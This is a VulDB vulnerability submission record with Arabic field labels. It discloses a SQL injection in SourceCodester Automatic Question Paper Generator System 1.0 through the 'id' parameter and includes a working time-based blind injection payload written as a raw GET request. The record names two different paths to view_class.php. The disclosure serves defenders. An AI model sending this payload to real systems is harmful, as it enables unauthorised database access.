| عنوان | SourceCodester Automatic Question Paper Generator System GET Parameter view_class.php SQL Injection |
|---|
| الوصف | A SQL Injection vulnerability was found in SourceCodester Automatic Question Paper Generator System 1.0. The vulnerable file is admin/courses/view_class.php and the injectable parameter is id.
A time-based blind injection poc is:
GET /aqpg/users/classes/view_class.php?id=1' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))lKSD) AND 'svPe'='svPe&_=16795545049481&_=1679554504948 HTTP/1.1 |
|---|
| المصدر | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| المستخدم | WWesleywww (UID 43117) |
|---|
| ارسال | 23/03/2023 08:00 AM (3 سنوات منذ) |
|---|
| الاعتدال | 23/03/2023 09:42 AM (2 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 223660 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_class.php معرف حقن SQL] |
|---|
| النقاط | 20 |
|---|